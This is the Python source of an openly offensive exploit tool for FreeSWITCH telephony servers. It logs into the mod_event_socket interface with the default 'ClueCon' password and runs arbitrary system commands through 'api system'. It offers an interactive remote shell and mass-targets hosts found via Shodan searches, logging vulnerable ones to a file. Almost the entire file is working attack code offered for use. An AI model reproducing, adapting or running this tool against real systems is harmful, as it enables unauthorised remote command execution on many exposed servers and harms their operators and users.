import os import sys import shodan import shutil import argparse import concurrent.futures from socket import * from rich.table import Table from rich.panel import Panel from rich.console import Console from prompt_toolkit import PromptSession from prompt_toolkit.formatted_text import HTML from prompt_toolkit.history import InMemoryHistory class FreeSwitchExploit: def __init__(self, args): self.console = Console() self.interactive = False self.args = args self.PASSWORD = 'ClueCon' self.TARGET_LIST_FILE = args.output if args.output else 'vulnerable.txt' self.CMD = 'printf "%s" "VUL" && echo -n "NERABLE " && echo -n "USER: "; whoami ; echo|set /p="VUL" & echo|set /p="NERABLE " & echo|set /p="USER: " & whoami' self.SHODAN_API_KEY = os.environ.get('SHODAN_API_KEY') self.target_list = [] if not self.SHODAN_API_KEY and self.args.auto: self.console.print("[bold red]Error: Shodan API key not found[/bold red]") self.console.print("To add the Shodan API key, export it as an environment variable:\n") self.console.print("export SHODAN_API_KEY=Your_Shodan_API_Key") sys.exit(1) def banner(self): banner_text = ''' +-+-+-+-+-+-+-+-+-+ |C|h|o|c|a|p|i|k|k| +-+-+-+-+-+-+-+-+-+ |T|r|H|a|c|k|n|o|n| +-+-+-+-+-+-+-+-+-+ ''' self.console.rule("[bold purple]Exploit for FreeSWITCH by Chocapikk and TrHacknon[/bold purple]", characters="═", style="green") self.console.print(Panel.fit(f"[bold cyan]{banner_text}[/bold cyan]", border_style="magenta"), justify="center") self.console.rule(characters="═", style="green") def interactive_shell(self, address, port): session = PromptSession(history=InMemoryHistory()) self.interactive = True while True: try: cmd = session.prompt(HTML('# ')) self.CMD = cmd if "exit" in cmd: raise KeyboardInterrupt if not cmd: continue if "clear" in cmd: if os.name == 'posix': os.system('clear') elif os.name == 'nt': os.system('cls') else: self.exploit_target(address, port) except KeyboardInterrupt: self.console.print("[bold][yellow][!] Exited shell[/bold][/yellow]") sys.exit(0) def exploit_target(self, address, port): try: s = socket(AF_INET, SOCK_STREAM) s.settimeout(5) s.connect((address, port)) response = s.recv(1024) if b'auth/request' in response: s.send(bytes('auth {}\n\n'.format(self.PASSWORD), 'utf8')) response = s.recv(1024) if b'+OK accepted' in response: self.console.print(f"[bold green]Authenticated - {address}:{port}[/bold green]") if self.args.target else None s.send(bytes('api system {}\n\n'.format(self.CMD), 'utf8')) response = s.recv(8096).decode() print(response) if self.args.target and self.interactive else None vuln_line = next((line for line in response.split('\n') if 'VULNERABLE' in line), None) if vuln_line and "api/response" in response: self.console.print(f"[bold green]Command executed successfully - {address}[/bold green]") self.console.print(vuln_line) self.interactive_shell(address, port) if self.args.target else None with open(self.TARGET_LIST_FILE, 'a') as file: file.write(f"{address}:{port}" + '\n') if self.args.auto or self.args.list else None return (f"{address}:{port}", vuln_line) else: return None else: if self.args.target: self.console.print(f"[bold red]Authentication failed - {address}:{port}[/bold red]") self.console.print(f"[bold red]Not vulnerable[/bold red]") sys.exit(1) else: self.console.print(f"[bold yellow]Not prompted for authentication, likely not vulnerable - {address}[/bold yellow]") if self.args.target else None except Exception as e: self.console.print(f"[bold red]Error: {e}[/bold red]") if self.args.target else None finally: s.close() def generate_targets(self): self.target_list = [] if self.args.list: try: with open(self.args.list, 'r') as f: lines = f.readlines() for line in lines: target = line.strip().split(':') if len(target) == 2: ip, port = target else: ip = target[0] port = self.args.port self.target_list.append((ip, int(port))) self.console.print(f"[bold green]Number of targets found: {len(self.target_list)}[/bold green]") except Exception as e: self.console.print(f"[bold red]Error: {e}[/bold red]") sys.exit(1) elif self.args.auto: try: self.console.print(f"[bold green]Searching on Shodan in {self.args.pages} page(s), please wait...[/bold green]") if self.SHODAN_API_KEY else None api = shodan.Shodan(self.SHODAN_API_KEY) for page in range(1, self.args.pages + 1): results = api.search('product:"FreeSWITCH mod_event_socket"', page=page) self.target_list.extend([(result['ip_str'], result['port']) for result in results['matches']]) self.console.print(f"[bold green]Number of targets found: {len(self.target_list)}[/bold green]") except shodan.APIError as e: self.console.print(f"[bold red]Error: {e}[/bold red]") sys.exit(1) elif self.args.target: target = self.args.target port = self.args.port self.target_list = [(target, port)] else: self.console.print("[bold red]Please specify either a single target with --target or use --auto for multiple targets[/bold red]") sys.exit(1) def run(self): self.banner() self.console.print("\n") self.generate_targets() table = Table(show_header=True, header_style="bold", title="Exploitation Results") table.add_column("Target", style="cyan") table.add_column("Result", style="magenta") with concurrent.futures.ThreadPoolExecutor(max_workers=self.args.threads) as executor: futures = {executor.submit(self.exploit_target, address, port): (address, port) for address, port in self.target_list} if (hasattr(self.args, 'auto') and self.args.auto)\ or (hasattr(self.args, 'list') and self.args.list): with self.console.status("[blink][bold purple]Hacking The Planet...\n", spinner="earth"): for future in concurrent.futures.as_completed(futures): address, port = futures[future] try: result = future.result() except Exception as e: self.console.print(f"[bold red]Error: {e}[/bold red]") continue if result: table.add_row(*result) else: for future in concurrent.futures.as_completed(futures): address, port = futures[future] try: result = future.result() except Exception as e: self.console.print(f"[bold red]Error: {e}[/bold red]") continue if result: table.add_row(*result) self.console.print(table) if (hasattr(self.args, 'auto') and self.args.auto)\ or (hasattr(self.args, 'list') and self.args.list)\ or self.args.list else None def main(): parser = argparse.ArgumentParser(description='FreeSWITCH Exploit') parser.add_argument('--target', help='Specify a single target IP') parser.add_argument('--threads', help='Number of threads', default=10, type=int) parser.add_argument('--list', help='Specify a file with list of targets ip:port. If port is not specified, default port will be used.') parser.add_argument('--port', help='Specify a port for the target', default=8021, type=int) parser.add_argument('--auto', action='store_true', help='Automatically generate a list of targets from Shodan') parser.add_argument('--pages', help='Number of pages for Shodan search', default=1, type=int) parser.add_argument('--output', help='Specify output file for vulnerable targets') args = parser.parse_args() if len(sys.argv)==1: parser.print_help(sys.stderr) sys.exit(1) if args.auto and (args.target or args.list): parser.error("--auto cannot be used with --target or --list") if args.target and args.list: parser.error("--target cannot be used with --list") exploit = FreeSwitchExploit(args) exploit.run() if __name__ == "__main__": main()